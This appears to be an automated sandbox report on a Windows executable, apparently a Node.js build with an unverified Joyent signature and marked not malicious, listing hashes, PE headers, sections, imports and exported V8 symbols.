                                                                                                                                                    SHA-512:9774F92DA77CC49F582402271457326A59B234CE78D0F6D447DAA7FEF53EC95223CD217B4C006572CF1106CF4B8A81F5CBF4994145C184E4BB2FAE2667939243
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:R81m.be .h.'. ;x.h~..h}..j.*.@..h...!;k....f..q........fdy..0..j.r.6D..D.>P.X...5,.......,#.A..R.M........&.e......;...U\..M...#.W'.~. ......n.%!..9jVrJ@...T.k.{x.........P..}x.........t.wl.e./.h'.b/{..-.J@...{....t...,U.0D9.u.h.u...Y...tVrJ...)..].Ve..P....9$....".......(-..p9..<...9.....t..0DG....e..7.|frJ@...o............Z..{...}8..bCKl...6....\.K.......{...[...o.6.........9.M..vh...;2.z.c..]K-....Il...m..@...M..\.G..a,...o...1...u}:!..wR....[7^...E....@....<.......p.~....\..2.).$.N.7O.T.O*Gt?..=..=.V...%.=..c...._.b:...h.|'8"_.1}..){..X.v.O....}.[P&...E,.5...]$...j..W.b.7:...sK0...c..u.)...d..0Q.^..-.+r...F.#.F....l...9...?.....u>.-t5...E.....5V..<.8.mMU.S>..,.D...ku.Y.S...!.e......j..$...I.......E.@E...R.D..?.5...e.<ip...-......"...Xo.eE4'..h7.I..tf6p*.1&......Q,u.~...yr.;...l.$...^.5..Z.:.2!s..r.U....;...A.3....Y.`.y...B.N..h.q6.\....M...nG.C.>..F.RL.......pv.r5..,].l..G..K...k...Y.@k.>...(.......+..T..#.!}.nF."]....m......n2..Lc...J.....,.%
                                                                                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                    Entropy (8bit):6.70084638649706
                                                                                                                                                    TrID:
                                                                                                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:lJ2eYRm0Bd.exe
                                                                                                                                                    File size:6'599'040 bytes
                                                                                                                                                    MD5:47d732373d0f515ccb37b09f2f55d178
                                                                                                                                                    SHA1:0365f9d183117fd29ab29574b74b67c570651918
                                                                                                                                                    SHA256:37bb336d579f839aa98af8218718eae84631c7cdf7ed4586728db333ea724987
                                                                                                                                                    SHA512:565dc06a6b7645989364a4ba81d64b6524f3e0e67723abf0b41de23da00eb5a5b0eeb7c1d14aaa75b76c71603303e43b8f74443cd3eb07a552e3e64c63611d6b
                                                                                                                                                    SSDEEP:98304:pTzCSONEpdVjeMOz6R3QoT9M6QmNp8rOARyI6:tzCSOepdVjnOz6R3f9HQxRyI6
                                                                                                                                                    TLSH:85668D46B3F500E8C4A7E078CA4A5507DBB1BC0553209BEB316CA3951F73AE29E7E794
                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........]..............1.........K.............7.......:.................).....2.......3.......>.......4.....Rich............PE..d..
                                                                                                                                                    Icon Hash:0731f048484d170e
                                                                                                                                                    Entrypoint:0x1403a213c
                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                    Digitally signed:true
                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                    Time Stamp:0x55010B43 [Thu Mar 12 03:42:59 2015 UTC]
                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:5
                                                                                                                                                    OS Version Minor:2
                                                                                                                                                    File Version Major:5
                                                                                                                                                    File Version Minor:2
                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                    Subsystem Version Minor:2
                                                                                                                                                    Import Hash:d9ade7d6b10847ae0c9bdee57ae6e806
                                                                                                                                                    Signature Valid:false
                                                                                                                                                    Signature Issuer:CN=thawte SHA256 Code Signing CA, O="thawte, Inc.", C=US
                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                    Not Before, Not After
                                                                                                                                                    • 11/20/2014 1:00:00 AM 11/21/2015 12:59:59 AM
                                                                                                                                                    Subject Chain
                                                                                                                                                    • CN="Joyent, Inc", O="Joyent, Inc", L=San Francisco, S=California, C=US
                                                                                                                                                    Version:3
                                                                                                                                                    Thumbprint MD5:678A9D1678E4040E7C219C956EAA721C
                                                                                                                                                    Thumbprint SHA-1:5382A0D995FB2CA7BE57D79372C3E986465D003D
                                                                                                                                                    Thumbprint SHA-256:61625E212DCADED59C894CDFE9DE2866BBB8BA306540BFFE76A2D7FF1228A253
                                                                                                                                                    Serial:54DEF11DABA5F782C77D9C8AC3CA2170
                                                                                                                                                    Instruction
                                                                                                                                                    dec eax
                                                                                                                                                    sub esp, 28h
                                                                                                                                                    call 00007F83784AA078h
                                                                                                                                                    dec eax
                                                                                                                                                    add esp, 28h
                                                                                                                                                    jmp 00007F837849C1DBh
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    inc eax
                                                                                                                                                    push ebx
                                                                                                                                                    dec eax
                                                                                                                                                    sub esp, 20h
                                                                                                                                                    dec eax
                                                                                                                                                    mov ebx, ecx
                                                                                                                                                    dec eax
                                                                                                                                                    lea ecx, dword ptr [esp+30h]
                                                                                                                                                    call dword ptr [0003623Ch]
                                                                                                                                                    dec eax
                                                                                                                                                    mov edx, dword ptr [esp+30h]
                                                                                                                                                    dec eax
                                                                                                                                                    or ecx, FFFFFFFFh
                                                                                                                                                    dec ecx
                                                                                                                                                    mov ebx, 2AC18000h
                                                                                                                                                    and dword ptr [esi+62h], ecx
                                                                                                                                                    dec byte ptr [eax-48h]
                                                                                                                                                    mov ebp, D5E57A42h
                                                                                                                                                    xchg eax, esp
                                                                                                                                                    mov edi, D30349D6h
                                                                                                                                                    dec eax
                                                                                                                                                    mul edx
                                                                                                                                                    dec eax
                                                                                                                                                    mov eax, 93406FFFh
                                                                                                                                                    pop es
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax-3Fh], cl
                                                                                                                                                    jmp far 0F48h : D03B4817h
                                                                                                                                                    dec edi
                                                                                                                                                    ror dword ptr [eax-7Bh], 1
                                                                                                                                                    Programming Language:
                                                                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                                                                    • [C++] VS2010 SP1 build 40219
                                                                                                                                                    • [ASM] VS2010 SP1 build 40219
                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                    • [EXP] VS2010 SP1 build 40219
                                                                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                                                                    • [LNK] VS2010 SP1 build 40219
                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x5c72e00xc266.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5c5a140xa0.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x62c0000x1a884.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5f30000x314dc.pdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x649a000x1780.reloc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x6470000xafc4.reloc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3d88600x1c.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x3d80000x7c8.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                    .text0x10000x3d6d8a0x3d6e00unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rdata0x3d80000x1fb5460x1fb600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .data0x5d40000x1e4200x15200False0.2694850221893491data4.071760582593677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                    .pdata0x5f30000x314dc0x31600False0.48809335443037977data6.399688028559875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    text0x6250000x1a310x1c00False0.4564732142857143data5.568529782933704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE
                                                                                                                                                    data0x6270000x49400x4a00False0.4792546452702703data6.286451083249169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rsrc0x62c0000x1a8840x1aa00False0.27841659330985913data5.006341842234157IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .reloc0x6470000xf8340xfa00False0.123171875data4.600846132118985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                    WEVT_TEMPLATE0x62c3440x1522dataEnglishUnited States0.2748613678373383
                                                                                                                                                    RT_ICON0x62d8680x468Device independent bitmap graphic, 16 x 32 x 32, image size 2048EnglishUnited States0.8147163120567376
                                                                                                                                                    RT_ICON0x62dcd00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192EnglishUnited States0.5100844277673546
                                                                                                                                                    RT_ICON0x62ed780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 18432EnglishUnited States0.4122406639004149
                                                                                                                                                    RT_ICON0x6313200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 32768EnglishUnited States0.3573452999527633
                                                                                                                                                    RT_ICON0x6355480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 131072EnglishUnited States0.22348574470602153
                                                                                                                                                    RT_STRING0x645d700x21edataEnglishUnited States0.27121771217712176
                                                                                                                                                    RT_STRING0x645f900x26edataEnglishUnited States0.2684887459807074
                                                                                                                                                    RT_STRING0x6462000x18edataEnglishUnited States0.36432160804020103
                                                                                                                                                    RT_MESSAGETABLE0x6463900x30Matlab v4 mat-file (little endian) I, text, rows 1342177284, columns 1342177284, imaginaryEnglishUnited States1.0416666666666667
                                                                                                                                                    RT_GROUP_ICON0x6463c00x4cdataEnglishUnited States0.75
                                                                                                                                                    RT_VERSION0x64640c0x31cdataEnglishUnited States0.47738693467336685
                                                                                                                                                    RT_MANIFEST0x6467280x15aASCII text, with CRLF line terminatorsEnglishUnited States0.5491329479768786
                                                                                                                                                    DLLImport
                                                                                                                                                    WS2_32.dllgethostname, ntohs, WSAGetLastError, send, closesocket, WSASetLastError, recv, shutdown, inet_addr, ntohl, htons, htonl, socket, bind, setsockopt, recvfrom, connect, ioctlsocket, getsockopt, select, WSASocketW, WSAIoctl, GetAddrInfoW, FreeAddrInfoW, listen, WSADuplicateSocketW, getsockname, WSASend, WSARecv, getpeername, WSASendTo, WSARecvFrom, WSAStartup, accept, gethostbyname, gethostbyaddr, getservbyname, getservbyport, inet_ntoa
                                                                                                                                                    KERNEL32.dllGetProcAddress, LoadLibraryA, QueryPerformanceCounter, GetTickCount, SetLastError, GlobalMemoryStatus, GetVersion, GetStdHandle, GetFileType, GetModuleHandleA, GetCurrentThreadId, FindClose, RtlVirtualUnwind, FlushConsoleInputBuffer, ExpandEnvironmentStringsA, GetWindowsDirectoryA, SetErrorMode, GetQueuedCompletionStatus, CreateIoCompletionPort, ReadDirectoryChangesW, GetFileAttributesW, CreateFileW, GetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, GetConsoleMode, SetHandleInformation, CreateEventA, PostQueuedCompletionStatus, QueueUserWorkItem, GetCurrentProcess, Process32First, InitializeCriticalSection, LeaveCriticalSection, GetModuleFileNameW, EnterCriticalSection, Process32Next, GlobalMemoryStatusEx, SetCurrentDirectoryW, GetSystemInfo, SetConsoleTitleW, GetConsoleTitleW, CreateToolhelp32Snapshot, QueryPerformanceFrequency, LoadLibraryExW, LocalFree, UnregisterWait, WriteConsoleInputW, GetNumberOfConsoleInputEvents, SetConsoleTextAttribute, ReadConsoleA, SetConsoleMode, SetConsoleCursorPosition, WriteConsoleW, FillConsoleOutputCharacterW, RegisterWaitForSingleObject, GetConsoleScreenBufferInfo, FillConsoleOutputAttribute, DuplicateHandle, ReadConsoleInputW, SetInformationJobObject, CreateProcessW, CreateJobObjectW, AssignProcessToJobObject, GetExitCodeProcess, TerminateProcess, UnregisterWaitEx, CreateFileA, GetNamedPipeHandleStateA, ConnectNamedPipe, GetStartupInfoW, FindFirstFileW, MoveFileExW, CreateDirectoryW, SetFileTime, WriteFile, ReadFile, FlushFileBuffers, CreateHardLinkW, RemoveDirectoryW, DeviceIoControl, FindNextFileW, GetFileInformationByHandle, PeekNamedPipe, CreateNamedPipeW, WaitNamedPipeW, CreateNamedPipeA, WaitForSingleObject, SwitchToThread, Sleep, SetConsoleCtrlHandler, MultiByteToWideChar, TryEnterCriticalSection, SetEvent, CreateSemaphoreA, ReleaseSemaphore, ResetEvent, WaitForMultipleObjects, DeleteCriticalSection, GetThreadContext, TlsGetValue, RtlCaptureContext, GetCurrentThread, VirtualFree, GetSystemTimeAsFileTime, TlsSetValue, LoadLibraryW, IsBadWritePtr, GetSystemDirectoryA, GetTimeZoneInformation, GetEnvironmentStringsW, GetTempFileNameA, OpenThread, IsDebuggerPresent, VirtualProtect, OutputDebugStringA, TlsAlloc, GetThreadTimes, GetTempPathA, SuspendThread, ResumeThread, DeleteFileA, HeapFree, DecodePointer, EncodePointer, HeapAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapReAlloc, FileTimeToSystemTime, FileTimeToLocalFileTime, GetDriveTypeA, FindFirstFileExA, ReadConsoleInputA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, RtlLookupFunctionEntry, ExitThread, CreateThread, SetStdHandle, InitializeCriticalSectionAndSpinCount, SetFilePointer, SetFileAttributesW, GetConsoleCP, HeapSetInformation, HeapCreate, SetHandleCount, RtlUnwindEx, RaiseException, RtlPcToFileHeader, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FlsGetValue, FlsSetValue, FlsFree, FlsAlloc, HeapSize, LCMapStringW, GetFullPathNameA, GetStringTypeW, CompareStringW, SetEnvironmentVariableA, GetDriveTypeW, SetEndOfFile, GetProcessHeap, FreeLibrary, GetVersionExA, WideCharToMultiByte, GetCurrentProcessId, CloseHandle, FreeEnvironmentStringsW, OpenFileMappingW, CreateFileMappingW, GetLastError, OpenProcess, CreateRemoteThread, SetEnvironmentVariableW, UnmapViewOfFile, MapViewOfFile, GetEnvironmentVariableW, CancelIo, FormatMessageA, SetNamedPipeHandleState, VirtualAlloc
                                                                                                                                                    USER32.dllGetProcessWindowStation, MessageBoxA, GetDesktopWindow, GetUserObjectInformationW
                                                                                                                                                    WINMM.dlltimeGetTime
                                                                                                                                                    ADVAPI32.dllRegisterEventSourceA, ReportEventA, RegQueryValueExA, RegOpenKeyExA, RegCloseKey, RegEnumKeyExA, RegQueryValueExW, RegOpenKeyExW, DeregisterEventSource
                                                                                                                                                    IPHLPAPI.DLLGetAdaptersAddresses
                                                                                                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                                    NameOrdinalAddress
                                                                                                                                                    ??0?$Handle@VFunctionTemplate@v8@@@v8@@QEAA@PEAVFunctionTemplate@1@@Z10x140002bd0
                                                                                                                                                    ??0?$Handle@VFunctionTemplate@v8@@@v8@@QEAA@XZ20x140002bb0
                                                                                                                                                    ??0?$Handle@VObject@v8@@@v8@@QEAA@PEAVObject@1@@Z30x140002bd0
                                                                                                                                                    ??0?$Handle@VObject@v8@@@v8@@QEAA@XZ40x140002bb0
                                                                                                                                                    ??0?$Persistent@VFunctionTemplate@v8@@@v8@@QEAA@XZ50x140002bb0
                                                                                                                                                    ??0?$Persistent@VObject@v8@@@v8@@QEAA@XZ60x140002bb0
                                                                                                                                                    ??0AccessorInfo@v8@@QEAA@PEAPEAVObject@internal@1@@Z70x140002bd0
                                                                                                                                                    ??0ActivityControl@v8@@QEAA@AEBV01@@Z80x1400017c0
                                                                                                                                                    ??0ActivityControl@v8@@QEAA@XZ90x1400017c0
                                                                                                                                                    ??0AsciiValue@String@v8@@QEAA@V?$Handle@VValue@v8@@@2@@Z100x140179590
                                                                                                                                                    ??0Buffer@node@@AEAA@V?$Handle@VObject@v8@@@v8@@_K@Z110x1400139d0
                                                                                                                                                    ??0Buffer@node@@QEAA@AEBV01@@Z120x140009810
                                                                                                                                                    ??0DeclareExtension@v8@@QEAA@PEAVExtension@1@@Z130x140001380
                                                                                                                                                    ??0Extension@v8@@QEAA@PEBD0HPEAPEBDH@Z140x14015f4c0
                                                                                                                                                    ??0ExtensionConfiguration@v8@@QEAA@HQEAPEBD@Z150x140001660
                                                                                                                                                    ??0ExternalAsciiStringResource@String@v8@@IEAA@XZ160x140001110
                                                                                                                                                    ??0ExternalAsciiStringResourceImpl@v8@@QEAA@PEBD_K@Z170x1400011d0
                                                                                                                                                    ??0ExternalAsciiStringResourceImpl@v8@@QEAA@XZ180x1400011b0
                                                                                                                                                    ??0ExternalResourceVisitor@v8@@QEAA@AEBV01@@Z190x1400015a0
                                                                                                                                                    ??0ExternalResourceVisitor@v8@@QEAA@XZ200x1400015a0
                                                                                                                                                    ??0ExternalStringResource@String@v8@@IEAA@XZ210x140001110
                                                                                                                                                    ??0ExternalStringResourceBase@String@v8@@IEAA@XZ220x1400010e0
                                                                                                                                                    ??0HandleScope@v8@@QEAA@XZ230x14015fc40
                                                                                                                                                    ??0HeapStatistics@v8@@QEAA@XZ240x140173b00
                                                                                                                                                    ??0Locker@v8@@QEAA@PEAVIsolate@1@@Z250x14015cbe0
                                                                                                                                                    ??0ObjectWrap@node@@QEAA@AEBV01@@Z260x140001d30
                                                                                                                                                    ??0ObjectWrap@node@@QEAA@XZ270x1400019c0
                                                                                                                                                    ??0OutputStream@v8@@QEAA@AEBV01@@Z280x140001720
                                                                                                                                                    ??0OutputStream@v8@@QEAA@XZ290x140001720
                                                                                                                                                    ??0PersistentHandleVisitor@v8@@QEAA@AEBV01@@Z300x1400015a0
                                                                                                                                                    ??0PersistentHandleVisitor@v8@@QEAA@XZ310x1400015a0
                                                                                                                                                    ??0ResourceConstraints@v8@@QEAA@XZ320x14015f690
                                                                                                                                                    ??0RetainedObjectInfo@v8@@IEAA@XZ330x1400132c0
                                                                                                                                                    ??0Scope@Isolate@v8@@QEAA@PEAV12@@Z340x140001480
                                                                                                                                                    ??0ScriptData@v8@@QEAA@AEBV01@@Z350x140001040
                                                                                                                                                    ??0ScriptData@v8@@QEAA@XZ360x140001040
                                                                                                                                                    ??0StartupDataDecompressor@v8@@QEAA@AEBV01@@Z370x1400014b0
                                                                                                                                                    ??0StartupDataDecompressor@v8@@QEAA@XZ380x14015f160
                                                                                                                                                    ??0TryCatch@v8@@QEAA@XZ390x1401649d0
                                                                                                                                                    ??0Unlocker@v8@@QEAA@PEAVIsolate@1@@Z400x14015cea0
                                                                                                                                                    ??0Utf8Value@String@v8@@QEAA@V?$Handle@VValue@v8@@@2@@Z410x140179370
                                                                                                                                                    ??0Value@String@v8@@QEAA@V?$Handle@VValue@v8@@@2@@Z420x1401797c0
                                                                                                                                                    ??1ActivityControl@v8@@UEAA@XZ430x1400017b0
                                                                                                                                                    ??1AsciiValue@String@v8@@QEAA@XZ440x1401797b0
                                                                                                                                                    ??1Buffer@node@@UEAA@XZ450x140013a40
                                                                                                                                                    ??1Extension@v8@@UEAA@XZ460x140001270
                                                                                                                                                    ??1ExternalAsciiStringResource@String@v8@@UEAA@XZ470x1400010d0
                                                                                                                                                    ??1ExternalAsciiStringResourceImpl@v8@@UEAA@XZ480x1400010d0
                                                                                                                                                    ??1ExternalResourceVisitor@v8@@UEAA@XZ490x140001590
                                                                                                                                                    ??1ExternalStringResource@String@v8@@UEAA@XZ500x1400010d0
                                                                                                                                                    ??1ExternalStringResourceBase@String@v8@@UEAA@XZ510x1400010d0
                                                                                                                                                    ??1HandleScope@v8@@QEAA@XZ520x14015fd40
                                                                                                                                                    ??1Locker@v8@@QEAA@XZ530x14015ce40
                                                                                                                                                    ??1ObjectWrap@node@@UEAA@XZ540x1400019e0
                                                                                                                                                    ??1OutputStream@v8@@UEAA@XZ550x140001700
                                                                                                                                                    ??1PersistentHandleVisitor@v8@@UEAA@XZ560x140001590
                                                                                                                                                    ??1RetainedObjectInfo@v8@@MEAA@XZ570x1400132d0
                                                                                                                                                    ??1Scope@Isolate@v8@@QEAA@XZ580x1400014a0
                                                                                                                                                    ??1ScriptData@v8@@UEAA@XZ590x140001030
                                                                                                                                                    ??1StartupDataDecompressor@v8@@UEAA@XZ600x14015f1d0
                                                                                                                                                    ??1TryCatch@v8@@QEAA@XZ610x140164a20
                                                                                                                                                    ??1Unlocker@v8@@QEAA@XZ620x14015cf10
                                                                                                                                                    ??1Utf8Value@String@v8@@QEAA@XZ630x1401797b0
                                                                                                                                                    ??1Value@String@v8@@QEAA@XZ640x1401797b0
                                                                                                                                                    ??4?$Handle@VFunctionTemplate@v8@@@v8@@QEAAAEAV01@AEBV01@@Z650x1400019b0
                                                                                                                                                    ??4?$Handle@VObject@v8@@@v8@@QEAAAEAV01@AEBV01@@Z660x1400019b0
                                                                                                                                                    ??4?$Persistent@VFunctionTemplate@v8@@@v8@@QEAAAEAV01@AEBV01@@Z670x1400019b0
                                                                                                                                                    ??4?$Persistent@VObject@v8@@@v8@@QEAAAEAV01@AEBV01@@Z680x1400019b0
                                                                                                                                                    ??4AccessorInfo@v8@@QEAAAEAV01@AEBV01@@Z690x1400019b0
                                                                                                                                                    ??4AccessorSignature@v8@@QEAAAEAV01@AEBV01@@Z700x1400011a0
                                                                                                                                                    ??4ActivityControl@v8@@QEAAAEAV01@AEBV01@@Z710x1400011a0
                                                                                                                                                    ??4Buffer@node@@QEAAAEAV01@AEBV01@@Z720x140009860
                                                                                                                                                    ??4Context@v8@@QEAAAEAV01@AEBV01@@Z730x1400011a0
                                                                                                                                                    ??4CpuProfile@v8@@QEAAAEAV01@AEBV01@@Z740x1400011a0
                                                                                                                                                    ??4CpuProfileNode@v8@@QEAAAEAV01@AEBV01@@Z750x1400011a0
                                                                                                                                                    ??4CpuProfiler@v8@@QEAAAEAV01@AEBV01@@Z760x1400011a0
                                                                                                                                                    ??4Data@HandleScope@v8@@QEAAAEAV012@AEBV012@@Z770x140001010
                                                                                                                                                    ??4Data@v8@@QEAAAEAV01@AEBV01@@Z780x1400011a0
                                                                                                                                                    ??4Debug@v8@@QEAAAEAV01@AEBV01@@Z790x1400011a0
                                                                                                                                                    ??4DeclareExtension@v8@@QEAAAEAV01@AEBV01@@Z800x1400011a0
                                                                                                                                                    ??4Exception@v8@@QEAAAEAV01@AEBV01@@Z810x1400011a0
                                                                                                                                                    ??4ExtensionConfiguration@v8@@QEAAAEAV01@AEBV01@@Z820x140001670
                                                                                                                                                    ??4ExternalResourceVisitor@v8@@QEAAAEAV01@AEBV01@@Z830x1400011a0
                                                                                                                                                    ??4FunctionTemplate@v8@@QEAAAEAV01@AEBV01@@Z840x1400011a0
                                                                                                                                                    ??4HeapGraphEdge@v8@@QEAAAEAV01@AEBV01@@Z850x1400011a0
                                                                                                                                                    ??4HeapGraphNode@v8@@QEAAAEAV01@AEBV01@@Z860x1400011a0
                                                                                                                                                    ??4HeapProfiler@v8@@QEAAAEAV01@AEBV01@@Z870x1400011a0
                                                                                                                                                    ??4HeapSnapshot@v8@@QEAAAEAV01@AEBV01@@Z880x1400011a0
                                                                                                                                                    ??4HeapStatistics@v8@@QEAAAEAV01@AEBV01@@Z890x140001450
                                                                                                                                                    ??4Message@v8@@QEAAAEAV01@AEBV01@@Z900x1400011a0
                                                                                                                                                    ??4ObjectTemplate@v8@@QEAAAEAV01@AEBV01@@Z910x1400011a0
                                                                                                                                                    ??4ObjectWrap@node@@QEAAAEAV01@AEBV01@@Z920x140001d50
                                                                                                                                                    ??4OutputStream@v8@@QEAAAEAV01@AEBV01@@Z930x1400011a0
                                                                                                                                                    ??4PersistentHandleVisitor@v8@@QEAAAEAV01@AEBV01@@Z940x1400011a0
                                                                                                                                                    ??4ResourceConstraints@v8@@QEAAAEAV01@AEBV01@@Z950x140001010
                                                                                                                                                    ??4Script@v8@@QEAAAEAV01@AEBV01@@Z960x1400011a0
                                                                                                                                                    ??4ScriptData@v8@@QEAAAEAV01@AEBV01@@Z970x1400011a0
                                                                                                                                                    ??4Signature@v8@@QEAAAEAV01@AEBV01@@Z980x1400011a0
                                                                                                                                                    ??4StackFrame@v8@@QEAAAEAV01@AEBV01@@Z990x1400011a0
                                                                                                                                                    ??4StackTrace@v8@@QEAAAEAV01@AEBV01@@Z1000x1400011a0
                                                                                                                                                    ??4StartupDataDecompressor@v8@@QEAAAEAV01@AEBV01@@Z1010x1400014d0
                                                                                                                                                    ??4Template@v8@@QEAAAEAV01@AEBV01@@Z1020x1400011a0
                                                                                                                                                    ??4Testing@v8@@QEAAAEAV01@AEBV01@@Z1030x1400011a0
                                                                                                                                                    ??4TryCatch@v8@@QEAAAEAV01@AEBV01@@Z1040x140001630
                                                                                                                                                    ??4TypeSwitch@v8@@QEAAAEAV01@AEBV01@@Z1050x1400011a0
                                                                                                                                                    ??4Unlocker@v8@@QEAAAEAV01@AEBV01@@Z1060x1400019b0
                                                                                                                                                    ??4V8@v8@@QEAAAEAV01@AEBV01@@Z1070x1400011a0
                                                                                                                                                    ??C?$Handle@VFunctionTemplate@v8@@@v8@@QEBAPEAVFunctionTemplate@1@XZ1080x140002bf0
                                                                                                                                                    ??C?$Handle@VObject@v8@@@v8@@QEBAPEAVObject@1@XZ1090x140002bf0
                                                                                                                                                    ??D?$Handle@VFunctionTemplate@v8@@@v8@@QEBAPEAVFunctionTemplate@1@XZ1100x140002bf0
                                                                                                                                                    ??D?$Handle@VObject@v8@@@v8@@QEBAPEAVObject@1@XZ1110x140002bf0
                                                                                                                                                    ??DAsciiValue@String@v8@@QEAAPEADXZ1120x140002bf0
                                                                                                                                                    ??DAsciiValue@String@v8@@QEBAPEBDXZ1130x140002bf0
                                                                                                                                                    ??DUtf8Value@String@v8@@QEAAPEADXZ1140x140002bf0
                                                                                                                                                    ??DUtf8Value@String@v8@@QEBAPEBDXZ1150x140002bf0
                                                                                                                                                    ??DValue@String@v8@@QEAAPEAGXZ1160x140002bf0
                                                                                                                                                    ??DValue@String@v8@@QEBAPEBGXZ1170x140002bf0
                                                                                                                                                    ??_7ActivityControl@v8@@6B@1180x1403dbed0
                                                                                                                                                    ??_7Buffer@node@@6B@1190x1403dde40
                                                                                                                                                    ??_7Extension@v8@@6B@1200x1403dbe70
                                                                                                                                                    ??_7ExternalAsciiStringResource@String@v8@@6B@1210x1403dbe30
                                                                                                                                                    ??_7ExternalAsciiStringResourceImpl@v8@@6B@1220x1403dbe50
                                                                                                                                                    ??_7ExternalResourceVisitor@v8@@6B@1230x1403dbe90
                                                                                                                                                    ??_7ExternalStringResource@String@v8@@6B@1240x1403dbe30
                                                                                                                                                    ??_7ExternalStringResourceBase@String@v8@@6B@1250x1403dbe20
                                                                                                                                                    ??_7ObjectWrap@node@@6B@1260x1403dbee0
                                                                                                                                                    ??_7OutputStream@v8@@6B@1270x1403dbea0
                                                                                                                                                    ??_7PersistentHandleVisitor@v8@@6B@1280x1403dbe90
                                                                                                                                                    ??_7RetainedObjectInfo@v8@@6B@1290x1404f1800
                                                                                                                                                    ??_7ScriptData@v8@@6B@1300x1403dbe00
                                                                                                                                                    ??_7StartupDataDecompressor@v8@@6B@1310x1403dbe80
                                                                                                                                                    ??_FLocker@v8@@QEAAXXZ1320x1400016f0
                                                                                                                                                    ??_FUnlocker@v8@@QEAAXXZ1330x140001690
                                                                                                                                                    ?AddCallCompletedCallback@V8@v8@@SAXP6AXXZ@Z1340x140178ed0
                                                                                                                                                    ?AddGCEpilogueCallback@V8@v8@@SAXP6AXW4GCType@2@W4GCCallbackFlags@2@@Z0@Z1350x140178bd0
                                                                                                                                                    ?AddGCPrologueCallback@V8@v8@@SAXP6AXW4GCType@2@W4GCCallbackFlags@2@@Z0@Z1360x140178a60
                                                                                                                                                    ?AddImplicitReferences@V8@v8@@SAXV?$Persistent@VObject@v8@@@2@PEAV?$Persistent@VValue@v8@@@2@_K@Z1370x140178840
